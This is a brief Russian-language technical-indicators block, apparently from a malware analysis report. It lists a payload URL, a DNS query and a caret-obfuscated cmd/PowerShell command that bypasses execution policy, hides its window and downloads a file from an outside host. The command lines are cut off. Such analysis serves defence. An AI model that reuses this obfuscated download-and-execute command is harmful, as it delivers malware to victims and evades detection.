Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWerS^he^Ll^.exe -E^x^E^Cu^TI^ON^P^Ol^IC^y ^BYpA^Ss^ ^-noPR^ofILE ^-^wiN^DOw^S^T^Y^L^e ^Hi^Dd^eN^ (nE^W-oBjE^CT ^SyS^T^E^M.NeT.^WEBCliEN^t^).^dO^wN^Loa^dF^il^E('http://www...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "PoWerS^he^Ll^.exe -E^x^E^Cu^TI^ON^P^Ol^IC^y ^BYpA^Ss^ ^-noPR^ofILE ^-^wiN^DOw^S^T^Y^L^e ^Hi^Dd^eN^ (nE^W-oBjE^CT ^SyS^T^E^M.NeT.^WEBCliEN^t^).^dO^wN^Loa^dF^il^E('http://www...' (со скрытым окном)